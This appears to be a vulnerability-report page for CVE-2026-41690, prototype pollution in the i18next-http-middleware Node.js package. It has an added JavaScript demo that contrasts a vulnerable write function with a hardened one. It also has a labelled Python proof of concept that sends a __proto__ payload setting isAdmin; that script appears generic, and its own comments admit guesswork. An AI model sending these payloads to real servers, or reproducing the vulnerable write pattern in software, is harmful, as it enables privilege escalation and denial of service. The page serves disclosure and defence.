Security Vulnerability Report
CVE-2026-41690 CVSS 8.6 HIGH

Published: 2026-05-08 16:16:11
Last Modified: 2026-05-08 16:16:11

Description

i18next-http-middleware is a middleware for Node.js web frameworks such as Express and Fastify, and for Deno. Versions prior to 3.9.3 allow an unauthenticated HTTP client to pollute Object.prototype in the Node.js process hosting the middleware, via two unvalidated entry points that reach internal object-key writes: getResourcesHandler and missingKeyHandler. Polluting Object.prototype can break authorisation checks (for example, `if (user.isAdmin)` becoming true for every user), cause type-confusion denial of service and, depending on downstream code, be chained into remote code execution. NVD classifies the weakness as CWE-1321 (prototype pollution) and CWE-22 (path traversal).
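The description says the two handlers let request-controlled segments reach internal object-key writes. The block below is an added example, not code from i18next-http-middleware or from the advisory: a hypothetical `vulnerableWrite` that indexes plain objects with `lng`, `ns` and a key taken from the request, beside a hardened `hardenedWrite` that allowlists each segment, refuses prototype-chain names and stores data in null-prototype objects. The attacker input is constructed; `lng="constructor"`, `ns="prototype"` walks from any plain object to `Object.prototype`, so the written property appears on every object in the process, including an unrelated `user` object.

```javascript
// Added example (not i18next-http-middleware code): model of the bug class in
// the CVE description and a hardened form of the same write. Names hypothetical.

// Vulnerable: lng/ns/key come straight from the request and index plain objects.
// store["constructor"] is the Object function, store["constructor"]["prototype"]
// is Object.prototype, so the final assignment lands on every object. A
// lng="__proto__" segment reaches Object.prototype in one step the same way.
function vulnerableWrite(store, lng, ns, key, value) {
  if (!store[lng]) store[lng] = {};
  if (!store[lng][ns]) store[lng][ns] = {};
  store[lng][ns][key] = value;
}

const FORBIDDEN_KEYS = new Set(['__proto__', 'constructor', 'prototype']);

// Hardened: allowlist the shape of each segment (also rejects ".." traversal
// segments, relevant to the CWE-22 tag) and refuse prototype-chain names.
function safeSegment(segment) {
  if (typeof segment !== 'string' ||
      !/^[A-Za-z0-9_-]{1,64}$/.test(segment) ||
      FORBIDDEN_KEYS.has(segment)) {
    throw new Error(`rejected key segment: ${JSON.stringify(segment)}`);
  }
  return segment;
}

// Null-prototype containers plus own-property checks: no lookup on the store
// can ever resolve to Object.prototype, even if a bad key slipped through.
function hardenedWrite(store, lng, ns, key, value) {
  lng = safeSegment(lng); ns = safeSegment(ns); key = safeSegment(key);
  const has = (o, k) => Object.prototype.hasOwnProperty.call(o, k);
  if (!has(store, lng)) store[lng] = Object.create(null);
  if (!has(store[lng], ns)) store[lng][ns] = Object.create(null);
  store[lng][ns][key] = value;
}

// Constructed attacker input (not a captured request).
const ATTACK = { lng: 'constructor', ns: 'prototype', key: 'isAdmin', value: true };

function runDemo() {
  const user = {};   // stands in for a session object elsewhere in the process
  const result = {};
  try {
    vulnerableWrite({}, ATTACK.lng, ATTACK.ns, ATTACK.key, ATTACK.value);
    result.vulnerablePolluted = user.isAdmin === true;   // unrelated object gained isAdmin
  } finally {
    delete Object.prototype.isAdmin;                     // undo the pollution in this process
  }
  let rejected = false;
  try {
    hardenedWrite(Object.create(null), ATTACK.lng, ATTACK.ns, ATTACK.key, ATTACK.value);
  } catch (e) {
    rejected = true;
  }
  result.hardenedRejected = rejected;
  result.hardenedPolluted = user.isAdmin === true;
  // A legitimate write still works through the hardened path.
  const store = Object.create(null);
  hardenedWrite(store, 'en', 'translation', 'greeting', 'hello');
  result.legitimateStored = store.en.translation.greeting === 'hello';
  return result;
}

console.log(JSON.stringify(runDemo()));
```

Running the file with `node` prints `{"vulnerablePolluted":true,"hardenedRejected":true,"hardenedPolluted":false,"legitimateStored":true}`. The block-list alone is not enough in the general case (it misses e.g. `valueOf` or getters defined on the store), which is why the hardened path also keeps the store in null-prototype objects and checks own properties before descending.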

CVSS Details

CVSS Score
8.6
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:L

Configurations (Affected Products)

NVD has not yet published configuration (CPE) data for this CVE (status: Received). Affected range per the description and the GitHub advisory: i18next-http-middleware < 3.9.3; fixed in 3.9.3.

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# POC for CVE-2026-41690
# Targeting the getResourcesHandler or missingKeyHandler entry points
target_url = "http://localhost:3000/locales/en/translation"  # Example endpoint

# Malicious payload designed to pollute Object.prototype.
# This attempts to inject a property into the prototype chain.
payload = {
    "lng": "en",
    "ns": "translation",
    # The specific key depends on implementation, often merging user input directly.
    # Sending a JSON object with a __proto__ key
    "__proto__": {
        "polluted": True,
        "isAdmin": True,
    },
}

headers = {"Content-Type": "application/json"}

try:
    response = requests.post(target_url, json=payload, headers=headers, timeout=10)
    print(f"[+] Request sent to {target_url}")
    print(f"[+] Status Code: {response.status_code}")
    # Verification logic would typically run on the server side,
    # checking whether ({}).polluted is true
    print("[+] If vulnerable, Object.prototype has been polluted.")
except Exception as e:
    print(f"[-] Error: {e}")
```

References

https://github.com/i18next/i18next-http-middleware/security/advisories/GHSA-5fgg-jcpf-8jjw (GitHub security advisory, source: security-advisories@github.com)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-41690", "sourceIdentifier": "[email protected]", "published": "2026-05-08T16:16:11.473", "lastModified": "2026-05-08T16:16:11.473", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "18next-http-middleware is a middleware to be used with Node.js web frameworks like express or Fastify and also for Deno. Versions prior to 3.9.3 allow an unauthenticated HTTP client to pollute Object.prototype in the Node.js process hosting the middleware, via two unvalidated entry points that reach internal object-key writes: getResourcesHandler and missingKeyHandler. This can break authorisation checks (if (user.isAdmin) returning true for any user), cause type-confusion DoS, and depending on downstream code it can be chained into RCE."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:L", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 4.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}, {"lang": "en", "value": "CWE-1321"}]}], "references": [{"url": "https://github.com/i18next/i18next-http-middleware/security/advisories/GHSA-5fgg-jcpf-8jjw", "source": "[email protected]"}]}}